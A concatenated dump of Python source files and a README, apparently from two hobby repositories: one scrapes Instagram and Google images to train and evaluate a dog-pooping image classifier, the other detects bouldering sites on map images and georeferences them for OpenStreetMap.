main()<file_sep>from selenium import webdriver
from bs4 import BeautifulSoup as bs
import time
import re
from urllib.request import urlopen
import json
from pandas.io.json import json_normalize
import pandas as pd, numpy as np
#hashtag='dogpooping'
#hashtag='poopingdogs'
hashtag='dogsgoingpoop'
browser = webdriver.Chrome('C:/Users/kobys/Desktop/chromedriver')
browser.get('https://www.instagram.com/explore/tags/'+hashtag)
Pagelength = browser.execute_script("window.scrollTo(0, document.body.scrollHeight);")
links=[]
source = browser.page_source
data=bs(source, 'html.parser')
body = data.find('body')
script = body.find('span')
for link in script.findAll('a'):
if re.match("/p", link.get('href')):
links.append('https://www.instagram.com'+link.get('href'))
result=pd.DataFrame()
for i in range(len(links)):
try:
page = urlopen(links[i]).read()
data=bs(page, 'html.parser')
body = data.find('body')
script = body.find('script')
raw = script.text.strip().replace('window._sharedData =', '').replace(';', '')
json_data=json.loads(raw)
posts =json_data['entry_data']['PostPage'][0]['graphql']
posts= json.dumps(posts)
posts = json.loads(posts)
x = pd.DataFrame.from_dict(json_normalize(posts), orient='columns')
x.columns = x.columns.str.replace("shortcode_media.", "")
result=result.append(x)
except:
np.nan
# Just check for the duplicates
result = result.drop_duplicates(subset = 'shortcode')
result.index = range(len(result.index))
import os
import requests
result.index = range(len(result.index))
directory="C:/Users/kobys/Desktop/Images/"
for i in range(len(result)):
r = requests.get(result['display_url'][i])
with open(directory+result['shortcode'][i]+".jpg", 'wb') as f:
f.write(r.content)
<file_sep>import os
import label_image as li
def main():
models = ["Resnet","Inception","Mobilenet", "Nasnet", "Pnasnet"]
res = [224,299,224,331,331]
#Inception (299*299)
#Mobilenet (224*224)
#Nasnet (331*331)
#Pnasnet (331*331)
#Resnet (224*224)
mydir = "G:/My Drive/Analytic Apps/DApps_Project/Test_Images/"
for j in range(len(models)):
preds = []
acts = []
print(models[j])
for dirs, subdirs, files in os.walk(mydir):
for f in files:
# Create actual classes
if 'dnp' in f:
acts.append('dog not pooping')
else:
acts.append('dog pooping')
# Build path to test image, model graph, and model label
if f == "desktop.ini":
continue
image = dirs + f
graph = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +models[j] +"/2/output_graph.pb"
labels = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +models[j] +"/2/output_labels.txt"
print(image)
#print(graph)
#print(labels)
# Get the predicted classes
preds.append(li.label_image(graph=graph, labels=labels, image=image, height=res[j], width=res[j]))
#print(preds)
#print(acts)
# Build the confusion matrix
cf = [ #Actual
[0,0], #Predicted - DP
[0,0] # - DNP
]
correct = 0
total = len(preds)
for i in range( len(preds) ):
if preds[i] == 'dog pooping' and acts[i] == 'dog pooping':
cf[0][0] += 1
elif preds[i] == 'dog pooping' and acts[i] == 'dog not pooping':
cf[0][1] += 1
elif preds[i] == 'dog not pooping' and acts[i] == 'dog pooping':
cf[1][0] += 1
elif preds[i] == 'dog not pooping' and acts[i] == 'dog not pooping':
cf[1][1] += 1
print(cf)
print()
# Calculate the metrics for the model
accuracy = (cf[0][0] + cf[1][1]) / total
recall = cf[0][0] / (cf[0][0] + cf[1][0])
precision = cf[0][0] / (cf[0][0] + cf[0][1])
print('Accuracy:', accuracy)
print('Recall:', recall)
print('Precision:', precision)
# Write out results to a text file
out = open("G:/My Drive/Analytic Apps/DApps_Project/Results/" +models[j] +'3', "w")
out.write(models[j] +" Results\n")
out.write("Confusion Matrix\n")
out.write(str(cf[0][0]) +" " +str(cf[0][1]) +"\n")
out.write(str(cf[1][0]) +" " +str(cf[1][1]) +"\n")
out.write("Accuracy\n")
out.write(str(accuracy) +"\n")
out.write("Recall\n")
out.write(str(recall) +"\n")
out.write("Precision\n")
out.write(str(precision) +"\n")
out.close()
main()<file_sep>from google_images_download import google_images_download
def downloadImages(response, query, o_path, c_path):
'''
# keywords is the search query
# format is the image file format
# limit is the number of images to be downloaded - default is 100
# print urls is to print the image file url
# size is the image size which can be specified manually ("large, medium, icon")
# aspect_ratio denotes the height width ratio of images to download. ("tall, square, wide, panoramic")
# output_directory specifies the directory to save the images to
# chromedirver specifies the path of the chromedriver, which is needed to download more than 100 photos at once
'''
arguments = {"keywords": query,
"format": "jpg",
"limit":200,
"print_urls":False,
"size": "medium",
"aspect_ratio": "panoramic",
"output_directory": o_path,
"chromedriver": c_path}
try:
response.download(arguments)
# Handling File NotFound Error
except FileNotFoundError:
print('Error, no search results found')
def main():
# Creating an object
response = google_images_download.googleimagesdownload()
# Search queries
search_queries = ['dog outside']
# File output path
o_path = 'G:/My Drive/Analytic Apps/DApps_Project/Images_Staging/'
# Chrome driver path
c_path = 'C:/Users/kobys/Desktop/chromedriver.exe'
for query in search_queries:
downloadImages(response, query, o_path, c_path)
print()
main()
<file_sep># d = {'a': [1,4,6],'b':[2,8,4]}
# best_mods = []
# for k, v in d.items():
# print(v)
# print(max(v))
# print(v.index(max(v)))
# mod = k + str(v.index(max(v))+2) # get index of best model and add two to get the number of the model
# best_mods.append(mod)
# print(best_mods)
# d = {}
# d["Resnet2"] = {}
# d["Resnet2"]["dnp0.jpg"] = "dog pooping"
# d["Resnet2"]["dnp1.jpg"] = "dog not pooping"
# d["Resnet2"]["dp0.jpg"] = "dog pooping"
# d["Resnet2"]["dp1.jpg"] = "dog pooping"
# print(d)
import json
with open("actuals.json", "r") as read_file:
data = json.load(read_file)
data = data[0]
print(data)<file_sep>import os
#mydir = 'C:/Users/kobys/Desktop/DApps_Model/Images/dog_pooping'
#mydir = 'C:/Users/kobys/Desktop/DApps_Model/Images/dog_not_pooping'
mydir = 'G:/My Drive/Analytic Apps/DApps_Project/Images_Staging'
for dirs, subdirs, files in os.walk(mydir):
counter = 0
for f in files:
os.rename(os.path.join(mydir,f), os.path.join(mydir,'dnp'+str(counter)+'.jpg'))
counter += 1
|
ee760ae0c006519d0e476f796f45acb73a9fabb6
|
[
"Markdown",
"Python"
] | 8
|
Python
|
ksok44/Dog_Pooping_Recognition
|
cbc749cc2471ddb4ca973ad7d39af7ab9d824a1f
|
5e31061432451b47092a8af805170ada081ca9c7
|
refs/heads/master
|
<repo_name>moromi/moromi-apns-aws_sns_adapter<file_sep>/lib/moromi/apns/aws_sns_adapter/apns_extension.rb
class Moromi::Apns::Message::Base
include Moromi::Aws::Sns::Message::Base
def to_parameter
Moromi::Aws::Sns::Message::Parameter.new(apns: to_hash)
end
end
class Moromi::Apns::Environment::Base
def aws_sns_application_arn
@aws_sns_application_arn ||= Moromi::Apns::AwsSnsAdapter.config.aws_sns_application_arns[key]
end
end
<file_sep>/lib/moromi/apns/aws_sns_adapter.rb
require 'moromi/apns/aws_sns_adapter/version'
require 'moromi/apns/aws_sns_adapter/config'
require 'moromi/apns/aws_sns_adapter/apns_extension'
module Moromi
module Apns
module AwsSnsAdapter
def self.configure(&block)
yield @config ||= Config.new
end
def self.config
@config
end
end
end
end
<file_sep>/README.md
# Moromi::Apns::AwsSnsAdapter
[](http://rubygems.org/gems/moromi-apns-aws_sns_adapter)
extension for moromi-apns and moromi-aws-sns
## Installation
Add this line to your application's Gemfile:
```ruby
gem 'moromi-apns-aws_sns_adapter'
```
And then execute:
$ bundle
Or install it yourself as:
$ gem install moromi-apns-aws_sns_adapter
## Usage
- config/initializers/moromi/apns.rb
```ruby
Moromi::Apns.configure do |config|
config.identifiers = {
production: 'com.example.moromi.apns.production',
in_house: 'com.example.moromi.apns.inhouse',
debug: 'com.example.moromi.apns.debug'
}
end
Moromi::Apns::AwsSnsAdapter.configure do |config|
config.aws_sns_application_arns = {
production: 'arn:aws:sns:ap-northeast-1:000000000000:app/APNS/moromi-apns-production',
in_house: 'arn:aws:sns:ap-northeast-1:000000000000:app/APNS/moromi-apns-in_house',
debug: 'arn:aws:sns:ap-northeast-1:000000000000:app/APNS_SANDBOX/moromi-apns-debug'
}
end
```
- config/initializers/moromi/aws_sns.rb
```ruby
module Moromi
module Aws
module Sns
class Client
# @param [Moromi::Apns::Environment::Base]
def self.create(environment)
new(ENV['AWS_ACCESS_KEY'], ENV['AWS_SECRET_ACCESS_KEY'], ENV['AWS_REGION'], environment.aws_sns_application_arn)
end
end
end
end
end
```
### Register device
```ruby
environment = Moromi::Apns.environment('com.example.moromi.apns.production')
arn = Moromi::Aws::Sns::Client.create(environment).register(token: token)
# store arn
```
### Send APNS
```ruby
environment = Moromi::Apns.environment('com.example.moromi.apns.production')
message = Moromi::Apns::Message::Announce.make(message: 'Message')
client = Moromi::Aws::Sns::Client.create(environment)
client.send_apns_message(arn: arn, message: message, sandbox: environment.sandbox?)
```
- use ActiveJob
```ruby
class AmazonSnsJob < ApplicationJob
queue_as :amazon_sns
def perform(hash)
params = hash.with_indifferent_access
bundle_identifier = params[:bundle_identifier]
arn = params[:arn]
message = Moromi::Apns::Message::Builder.build(params[:data])
raise unless message.is_a? Moromi::Apns::Message::Base
environment = Moromi::Apns.environment(bundle_identifier)
client = Moromi::Aws::Sns::Client.create(environment)
client.send_apns_message(arn: arn, message: message, sandbox: environment.sandbox?)
rescue Moromi::Apns::Environment::InvalidEnvironment => e
Rails.logger.error e.message
rescue Aws::SNS::Errors::EndpointDisabled => e
Rails.logger.info e.message
end
# @param [Moromi::Apns::Message::Base] message
# @param [String] bundle_identifier
# @param [String] arn
def self.enqueue_job(bundle_identifier, arn, message)
params = {
bundle_identifier: bundle_identifier,
arn: arn,
data: message.serialize
}
perform_later(params)
end
end
```
## Development
After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
## Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/moromi/moromi-apns-aws_sns_adapter.
<file_sep>/lib/moromi/apns/aws_sns_adapter/config.rb
require 'active_support/configurable'
module Moromi
module Apns
module AwsSnsAdapter
class Config
include ActiveSupport::Configurable
config_accessor :aws_sns_application_arns
config_accessor :application_arn_builder_class
end
end
end
end
<file_sep>/lib/moromi/apns/aws_sns_adapter/version.rb
module Moromi
module Apns
module AwsSnsAdapter
VERSION = '0.4.0'
end
end
end
|
bb1189d249bb7d53f316c8f5a99a75ab6c41c04f
|
[
"Markdown",
"Ruby"
] | 5
|
Ruby
|
moromi/moromi-apns-aws_sns_adapter
|
4f6c3deee511bcd06d5a6691df71216598ba7e1b
|
abbf4c3c395a08b62fde81e509d7dd1a991f3bca
|
HEAD
|
<repo_name>bben86/tictactoe<file_sep>/src/js/view/tictactoe-component.jsx
import { connect } from 'react-redux';
import React, { Component } from 'react';
import 'babel/polyfill';
import { Row, Column } from 'js/core/common';
import { start, mark } from 'js/core/actions';
import StartComponent from 'js/view/start-component';
import PlayComponent from 'js/view/play-component';
import WinnerComponent from 'js/view/winner-component';
import DrawComponent from 'js/view/draw-component';
class TicTacToeComponent extends Component {
render() {
const { dispatch, isDraw, winner, play } = this.props;
const dispatchStart = () => dispatch(start());
if (!play) return (<StartComponent onStart={dispatchStart} />);
if (winner) return (<WinnerComponent onPlay={dispatchStart} winner={winner} />);
if (isDraw) return (<DrawComponent onPlay={dispatchStart} />);
const dispatchMark = (row, column) => dispatch(mark(row, column));
return (<PlayComponent onSelect={dispatchMark} marks={play.marks} />);
}
};
const isRow = row => mark => mark.row === row;
function findColumn(marks, column) {
const result = marks.find(mark => mark.column === column);
return result ? result.player : undefined;
}
function rowMarks(marks, row) {
const filteredMarks = marks.filter(isRow(row));
return {
left: findColumn(filteredMarks, Column.Left),
center: findColumn(filteredMarks, Column.Center),
right: findColumn(filteredMarks, Column.Right)
};
}
function playMarks(marks) {
return {
topRowMarks: rowMarks(marks, Row.Top),
middleRowMarks: rowMarks(marks, Row.Middle),
bottomRowMarks: rowMarks(marks, Row.Bottom),
};
}
function select(state) {
if (!state) return { };
return {
winner: state.winner,
isDraw: state.marks.length === 9 && !state.winner,
play: {
marks: playMarks(state.marks)
}
};
}
export default connect(select)(TicTacToeComponent);
<file_sep>/src/js/core/reduce.js
import { Player, ActionTypes, Column, Row } from './common';
const initialState = { marks: [], currentPlayer: Player.X, winner: undefined };
const players = [ Player.X, Player.O ];
const columns = [ Column.Left, Column.Center, Column.Right ];
const rows = [ Row.Top, Row.Middle, Row.Bottom ];
function rowsFrom(column) {
return rows.map(row => { return { row, column }; });
}
function columnsFrom(row) {
return columns.map(column => { return { row, column }; });
};
function* zip(array1, array2) {
const length = Math.min(array1.length, array2.length);
for (var i = 0; i < length; ++i) {
yield [ array1[i], array2[i] ];
}
}
const diagonals = [
[...zip(rows, columns)].map(([row, column]) => { return { row, column }; }),
[...zip(rows, columns.reverse())].map(([row, column]) => { return { row, column }; })
];
const winnerPaths = [
...columns.map(rowsFrom),
...rows.map(columnsFrom),
...diagonals
];
function firstOrUndefined(values) {
return values.length > 0
? values[0]
: undefined;
}
const playerAt = marks => location => {
var markArray =
marks
.filter(({row, column}) => row === location.row && column === location.column)
.map(({player}) => player);
return firstOrUndefined(markArray);
}
const playersOn = marks => path => {
return path
.map(playerAt(marks))
.filter(player => player !== undefined);
}
const ownsAll = player => pathPlayers => {
return pathPlayers.length === 3 &&
pathPlayers.every(p => p === player);
}
const isWinner = marks => player => {
return winnerPaths
.map(playersOn(marks))
.some(ownsAll(player));
}
function winnerOf(marks) {
const winnerArray = players.filter(isWinner(marks));
return firstOrUndefined(winnerArray);
}
function addMark(player, marks, row, column) {
return [...marks, { player, row, column }];
}
function otherPlayer(player) {
return player === Player.X
? Player.O
: Player.X;
}
function mark(state, {row, column}) {
const marks = addMark(state.currentPlayer, state.marks, row, column);
return {
...state,
marks,
currentPlayer: otherPlayer(state.currentPlayer),
winner: winnerOf(marks)
};
}
export default function (state = null, action) {
switch (action.type) {
case ActionTypes.Start: return initialState;
case ActionTypes.Mark: return mark(state, action.payload);
default: return state;
}
}
<file_sep>/src/js/view/index.jsx
import { createStore, applyMiddleware } from 'redux';
import React from 'react';
import { render } from 'react-dom';
import { Provider } from 'react-redux';
import thunkMiddleware from 'js/core/thunk-middleware';
import reduce from 'js/core/reduce';
import TicTacToeComponent from 'js/view/tictactoe-component';
const store = applyMiddleware(thunkMiddleware('error'))(createStore)(reduce);
const rootElement = document.getElementById('root');
render(
<Provider store={store}>
<TicTacToeComponent />
</Provider>,
rootElement
)
<file_sep>/src/js/view/draw-component.jsx
import React, { Component } from 'react';
export default class DrawComponent extends Component {
render() {
const { onPlay } = this.props;
return (
<div className="draw">
<p>Draw!</p>
<button onClick={onPlay}>Play Again</button>
</div>
);
}
};
<file_sep>/test/test-startup.js
var path = require('path');
var jsPath = path.join(__dirname, '../src/js');
require('app-module-path').addPath(jsPath);
<file_sep>/src/js/view/start-component.jsx
import React, { Component } from 'react';
export default class StartComponent extends Component {
render() {
const { onStart } = this.props;
return (
<div className="start">
<button onClick={onStart}>Start</button>
</div>
);
}
};
<file_sep>/src/js/core/common.js
export const Player = { X: 'X', O: 'O' };
export const ActionTypes = {
Start: 'start',
Mark: 'mark'
};
export const Column = {
Left: 'left',
Center: 'center',
Right: 'right'
};
export const Row = {
Top: 'top',
Middle: 'middle',
Bottom: 'bottom'
};
<file_sep>/src/js/view/play-component.jsx
import React, { Component } from 'react';
import { Row } from 'js/core/common';
import RowComponent from 'js/view/row-component';
export default class PlayComponent extends Component {
render() {
const { onSelect, marks } = this.props;
const onRowSelect = row => column => onSelect(row, column);
return (
<div className="play">
<RowComponent onSelect={onRowSelect(Row.Top)}
leftMark={marks.topRowMarks.left}
centerMark={marks.topRowMarks.center}
rightMark={marks.topRowMarks.right} />
<RowComponent onSelect={onRowSelect(Row.Middle)}
leftMark={marks.middleRowMarks.left}
centerMark={marks.middleRowMarks.center}
rightMark={marks.middleRowMarks.right} />
<RowComponent onSelect={onRowSelect(Row.Bottom)}
leftMark={marks.bottomRowMarks.left}
centerMark={marks.bottomRowMarks.center}
rightMark={marks.bottomRowMarks.right} />
</div>
);
}
};
|
bf336f8420516dbbff2ae0a0205be697f6408259
|
[
"JavaScript"
] | 8
|
JavaScript
|
bben86/tictactoe
|
03e265f7e492d5bc60c8d0b375f193c2210551db
|
ef154b84018662564c2352a37dfbdeb6ffbbe9a0
|
refs/heads/master
|
<repo_name>rajesh002/lab-jdbc-connection<file_sep>/src/controller/Main.java
package controller;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Properties;
import utility.ConnectionManager;
public class Main {
public static void main(String args[]) throws Exception {
ConnectionManager cm=new ConnectionManager();
Connection con=cm.getConnection();
if(con!=null)
System.out.println("Connection Established");
else
System.out.println("Check your Connection");
}
}
|
e5ce987aeee2ebc54082bab3a586c73a4c90d3cd
|
[
"Java"
] | 1
|
Java
|
rajesh002/lab-jdbc-connection
|
82a4fa56d0e072b1b8167e5e4c897b71490ffcdf
|
b20df6406b24c0dae2a0d576f276a0e8090c0d0b
|
refs/heads/master
|
<repo_name>qq919006380/musicPlayer<file_sep>/README.md
# musicPlayer
# API
## Properties
```
var audioObject = new Audio('http://xxx.com/xx.mp3')
```
- audioObject.play() starts playback
- audioObject.pause() pauses playback
- audioObject.autoPlay sets or gets the autoplay state
- audioObject.src sets or gets the music URL
- audioObject.volume sets or gets the volume; the maximum is 1 and 0 is mute
- audioObject.loop sets or gets the loop state
- audioObject.duration gets the track length in seconds
- audioObject.currentTime sets or gets the current playback time
- audioObject.ended whether playback has finished; read-only property
## Events
- playing fired when playback starts, when it resumes after a pause, or when playback starts after currentTime is set
- pause fired when playback is paused and when it ends
- ended fired when playback ends
- timeupdate fired when currentTime updates; how often it fires is decided by the system
- volumechange fired when the volume changes
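As a quick illustration of the properties and events listed above, here is a minimal sketch of how they fit together; the MP3 URL is only a placeholder, not a real file from this project.
```
var audioObject = new Audio('http://xxx.com/xx.mp3') // placeholder URL
audioObject.volume = 0.8  // 0 is mute, 1 is the maximum
audioObject.loop = false

// timeupdate fires as currentTime advances; how often is decided by the system
audioObject.ontimeupdate = function () {
  var progress = (audioObject.currentTime / audioObject.duration) * 100
  console.log('progress: ' + progress.toFixed(1) + '%')
}

// ended fires once playback finishes (audioObject.ended is then true)
audioObject.onended = function () {
  console.log('playback finished:', audioObject.ended)
}

audioObject.play() // start playback; call audioObject.pause() to pause
```
The player in js/index.js follows the same pattern: ontimeupdate drives the progress bar and onended advances to the next track.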
## Fetching data with AJAX
```
function getmusic(callback) {
var xhr = new XMLHttpRequest()
xhr.open("GET", "music.json", true)
xhr.onload = function() {
callback(JSON.parse(this.responseText)) // call a callback() to handle the response content
//...
}
xhr.send()
}
```
<file_sep>/js/index.js
var musicList=[]
var currentIndex=0
var audio=new Audio()
audio.autoplay=true
getmusic(function(list){
musicList=list
loadMusic(list[currentIndex])
})
audio.ontimeupdate=function(){
$('.musicbox .progress-now').style.width=(this.currentTime/this.duration)*100+'%'
}
audio.onplay=function(){
clock=setInterval(function(){
var min=Math.floor(audio.currentTime/60)
var sec=Math.floor(audio.currentTime%60)+''
sec=sec.length==2?sec:'0'+sec
$('.musicbox .time').innerText=min+':'+sec
},1000)
}
audio.onended=function(){
console.log('end')
currentIndex=(++currentIndex)%musicList.length
loadMusic(musicList[currentIndex])
}
audio.onpause=function(){
clearInterval(clock)
}
$('.musicbox .play').onclick=function(){
playSwitch()
}
$('.musicbox .forward').onclick=function(){
currentIndex = (++currentIndex)%musicList.length
console.log(currentIndex)
loadMusic(musicList[currentIndex])
playSwitch()
}
$('.musicbox .back').onclick=function(){
currentIndex=(musicList.length+(--currentIndex))%musicList.length
console.log(currentIndex)
loadMusic(musicList[currentIndex])
playSwitch()
}
$('.musicbox .bar').onclick=function(e){
var barWidth=e.offsetX/parseInt(getComputedStyle(this).width)
console.log(barWidth)
audio.currentTime=audio.duration*barWidth
}
function $(selector){
return document.querySelector(selector)
}
function playSwitch(){
if(audio.paused){ // paused is false while playing
$('.musicbox .play').querySelector('.fa').classList.remove('fa-play')
$('.musicbox .play').querySelector('.fa').classList.add('fa-pause')
audio.play()
}else{
$('.musicbox .play').querySelector('.fa').classList.remove('fa-pause')
$('.musicbox .play').querySelector('.fa').classList.add('fa-play')
audio.pause()
}
}
function getmusic(callback) {
var xhr = new XMLHttpRequest()
xhr.open("GET", "music.json", true)
xhr.onload = function() {
if((xhr.status >= 200 && xhr.status < 300) || xhr.status === 304) {
callback(JSON.parse(this.responseText))
} else {
document.write("<h1 style='text-align:center'>获取数据失败</h1>")
}
}
xhr.onerror = function() {
console.log('Network error')
}
xhr.send()
}
function loadMusic(musicObj){
$('.info .title').innerText=musicObj.title
$('.info .auther').innerText=musicObj.auther
$('.cover').style.backgroundImage='url('+musicObj.img+')'
audio.src=musicObj.src
}
|
7bf2ff22e96ade031889668eeb6600652ac42e65
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
qq919006380/musicPlayer
|
ba38a4cec70cb711a97eb0357385d6aaea66e6b6
|
af67d9d33e7081eacc5070721ea02833e32a75f4
|
refs/heads/master
|
<file_sep>appdirs==1.4.4
argon2-cffi==20.1.0
astroid==2.4.2
async-generator==1.10
attrs==20.3.0
backcall==0.2.0
beautifulsoup4==4.9.3
black==20.8b1
bleach==3.3.0
cffi==1.14.5
click==7.1.2
cycler==0.10.0
decorator==4.4.2
defusedxml==0.6.0
entrypoints==0.3
geojson==2.5.0
imageio==2.9.0
importlib-metadata==3.4.0
iniconfig==1.1.1
ipykernel==5.4.3
ipython==7.20.0
ipython-genutils==0.2.0
ipywidgets==7.6.3
isort==5.7.0
jedi==0.18.0
Jinja2==2.11.3
joblib==1.0.1
jsonschema==3.2.0
jupyter==1.0.0
jupyter-client==6.1.11
jupyter-console==6.2.0
jupyter-core==4.7.1
jupyterlab-pygments==0.1.2
jupyterlab-widgets==1.0.0
kiwisolver==1.3.1
lazy-object-proxy==1.4.3
lxml==4.6.2
MarkupSafe==1.1.1
matplotlib==3.3.4
mccabe==0.6.1
mistune==0.8.4
mypy-extensions==0.4.3
nbclient==0.5.2
nbconvert==6.0.7
nbformat==5.1.2
nest-asyncio==1.5.1
networkx==2.5
notebook==6.2.0
numpy==1.20.1
opencv-python==4.5.1.48
OSMPythonTools==0.2.9
packaging==20.9
pandas==1.2.2
pandocfilters==1.4.3
parso==0.8.1
pathspec==0.8.1
pexpect==4.8.0
pickleshare==0.7.5
Pillow==8.1.0
pluggy==0.13.1
prometheus-client==0.9.0
prompt-toolkit==3.0.16
ptyprocess==0.7.0
py==1.10.0
pycparser==2.20
Pygments==2.7.4
pylint==2.6.0
pyparsing==2.4.7
pyrsistent==0.17.3
pytest==6.2.2
pytest-sugar==0.9.4
python-dateutil==2.8.1
pytz==2021.1
PyWavelets==1.1.1
pyzmq==22.0.2
qtconsole==5.0.2
QtPy==1.9.0
regex==2020.11.13
scikit-image==0.18.1
scikit-learn==0.24.1
scipy==1.6.0
Send2Trash==1.5.0
six==1.15.0
soupsieve==2.2
termcolor==1.1.0
terminado==0.9.2
testpath==0.4.4
threadpoolctl==2.1.0
tifffile==2021.2.1
toml==0.10.2
tornado==6.1
traitlets==5.0.5
typed-ast==1.4.2
typing-extensions==3.7.4.3
ujson==4.0.2
wcwidth==0.2.5
webencodings==0.5.1
widgetsnbextension==3.5.1
wrapt==1.12.1
xarray==0.16.2
zipp==3.4.0
<file_sep>import numpy as np
from matplotlib import image as mpimg
from matplotlib import pyplot as plt
from OSMPythonTools.api import Api
api = Api()
# load transform matrix
geo2ind = np.load("data/geo2ind.npy")
# load piste d'Argenton
way_ids = [111415872, 235094917, 526991326, 235094922, 235094924, 235094919]
track_lat = []
track_lon = []
for way_id in way_ids:
way = api.query("way/" + str(way_id))
for node in way.nodes():
track_lat.append(node.lat())
track_lon.append(node.lon())
# get track as image indices
track_col, track_row = geo2ind @ np.stack(
(track_lat, track_lon, np.ones_like(track_lat))
)
# load image
general_map = mpimg.imread("img/plan_general.jpg")
# overlay OSM track over map image
plt.imshow(np.mean(general_map, axis=2), cmap="gray")
plt.plot(track_col, track_row, c="#ff7900cd")
plt.axis("off")
plt.savefig("visual_check.png", dpi=300, bbox_inches="tight")
<file_sep># annot-boulder-geodata
Retrieve geodata from [ABloc.org](http://abloc.org) and integrate it into [OpenStreetMap](https://www.openstreetmap.org) database
- Primary goal: Add the 37 boulder sites as nodes or areas with their names
- Secondary goal: Add additional tags such as grades https://wiki.openstreetmap.org/wiki/Climbing
## To do:
- [x] download sites map images
- [x] get POI from OSM and map images
- [x] get accurate pixel indices to geographic coordinates transform
- [x] detect boulder site blobs (in green)
- [x] quantize image colors (sites in green, roads in black, etc.)
- [x] separate blobs
- [ ] register sub-images (e.g. "zone de la 4ème à la 7ème épingle") to the general map
- [x] name boulder sites
- [ ] add to OSM
OSM track over map image:

Example of detected boulder sites:

## Licence
From [ABloc.org](http://abloc.org)
> Droits d'auteur: toute reproduction du topo est vivement encouragée par quelque moyen que ce soit (papier ou numérique) à l'exclusion d'une quelconque activité commerciale.
> *Copyrights: any reproduction of the topo is strongly encouraged by any means whatsoever (paper or digital) to the exclusion of any commercial activity.*
<file_sep>import numpy as np
import pandas as pd
import glob
from matplotlib import image as mpimg
from skimage import morphology, measure
n_bit = 2 ** 8 - 1
n_image = 8
# Morphology operation parameters
area_threshold = 256 # arbitrary large enough
opening_radius = 9
erosion_radius = 3
colors = np.load("data/colors.npy")
submaps = glob.glob("img/i*.jpg")
submaps.sort()
submaps.insert(0, "img/plan_general.jpg") # add general map
image_index = []
image_name = []
blob_index = []
centroid = []
for img_ind in range(1, n_image + 1):
img = mpimg.imread(f"data/{img_ind}_4_colors.png")
green = (img[:, :, 1] * n_bit).astype(int) # green channel
bw = green == colors[1, 1] # second label from color_quantization.py
# Morphological cleaning
bw = morphology.remove_small_holes(bw, area_threshold)
bw = morphology.remove_small_objects(bw, area_threshold)
bw = morphology.opening(bw, selem=morphology.disk(opening_radius))
# Erosion step to disconnect close blobs
bw = morphology.erosion(bw, selem=morphology.disk(erosion_radius))
# Get blobs centroids
label = measure.label(bw, connectivity=1)
regions = measure.regionprops(label)
for b_ind, region in enumerate(regions):
image_index.append(img_ind)
image_name.append(submaps[img_ind])
blob_index.append(b_ind)
centroid.append(region.centroid)
centroid = np.array(centroid)
data = {
"image_index": image_index,
"image_name": image_name,
"blob_index": blob_index,
"col": centroid[:, 1],
"row": centroid[:, 0],
}
df = pd.DataFrame(data)
df.to_csv("poi/blobs.csv")
<file_sep>import glob
import numpy as np
from matplotlib import image as mpimg
from matplotlib import colors
from sklearn.cluster import KMeans
# parameters
n_channel = 3
n_bit = 2 ** 8 - 1
n_cluster = 3 # black, green, orange
def rgb_to_flat_cyan_hsv(rgb: np.ndarray) -> np.ndarray:
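    """Convert an RGB image to a flat (N, 3) HSV array, shifting the hue origin by
    half a turn so warm hues (red/orange) sit away from the 0/1 wrap-around."""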
hsv = colors.rgb_to_hsv(rgb / n_bit).reshape((-1, n_channel))
hsv[:, 0] = np.mod(hsv[:, 0] + 0.5, 1) # shift hue origin to cyan
return hsv
def flat_cyan_hsv_to_rgb(hsv: np.ndarray) -> np.ndarray:
hsv[:, 0] = np.mod(hsv[:, 0] - 0.5, 1) # shift hue origin back to red
rgb = colors.hsv_to_rgb(hsv.reshape(-1, 1, n_channel))
return rgb
# get colors from reference image
ref = mpimg.imread("img/i-20eme 25eme epingle.jpg")
hsv = rgb_to_flat_cyan_hsv(ref)
saturated = hsv[:, 1] > 0.5 # keep saturated colors only
kmeans = KMeans(n_clusters=n_cluster).fit(hsv[saturated, :])
centers = flat_cyan_hsv_to_rgb(kmeans.cluster_centers_).reshape(n_cluster, n_channel)
centers = np.insert(centers, 0, [1.0, 1.0, 1.0], axis=0) # add white background
centers = (centers * n_bit).astype(ref.dtype)
np.save("data/colors.npy", centers) # colors LUT
# apply color quantization
submaps = glob.glob("img/i*.jpg")
submaps.sort()
submaps.insert(0, "img/plan_general.jpg") # add general map
for ind, submap in enumerate(submaps):
img = mpimg.imread(submap)
hsv = rgb_to_flat_cyan_hsv(img)
saturated = hsv[:, 1] > 0.5
labels = np.zeros(hsv.shape[0])
labels[saturated] = kmeans.predict(hsv[saturated, :]) + 1 # predict
labels = centers[labels.reshape(img.shape[:2]).astype(int)] # apply LUT
mpimg.imsave(f"data/{ind}_4_colors.png", labels)
<file_sep>import pandas as pd
from matplotlib import image as mpimg
from matplotlib import pyplot as plt
import re
def show_blob_figures(
df: pd.DataFrame, printed: str = "blob_index", s: int = 100, dpi: int = 100
) -> None:
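    """Overlay a text marker (taken from the `printed` column of df) on each blob's
    source image and save one annotated figure per image under data/."""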
image_name = ""
for blob in df.itertuples():
        if blob.image_name != image_name:  # compare strings by value, not identity
if image_name:
plt.savefig(f"data/{blob.image_index - 1}_show_blob.png", dpi=dpi)
img = mpimg.imread(blob.image_name)
plt.figure()
plt.imshow(img)
image_name = blob.image_name
marker = f"{getattr(blob, printed)}"
# remove "le" and "la" words, vowels and spaces
marker = re.sub(r"^le\s|^la\s|[aâeéèêioôuy\s]", "", marker)
# keep first 4 characters as scatter plot marker
marker = f"${marker[:4]}$"
plt.scatter(blob.col, blob.row, s=s, marker=marker, c="black")
plt.savefig(f"data/{blob.image_index}_show_blob.png", dpi=dpi)
<file_sep>import numpy as np
import pandas as pd
import cv2 as cv
# load POI
osm_df = pd.read_csv("poi/osm_poi.csv")
img_df = pd.read_csv("poi/map_img_poi.csv")
# convert to arrays
lat = osm_df.lat.values
lon = osm_df.lon.values
col = img_df.col.values
row = img_df.row.values
geo = np.stack((lat, lon)).T # geographic coordinates
ind = np.stack((col, row)).T # pixel indices
# estimate affine transform matrix using RANSAC algorithm
geo2ind = cv.estimateAffine2D(cv.UMat(geo), cv.UMat(ind))[0]
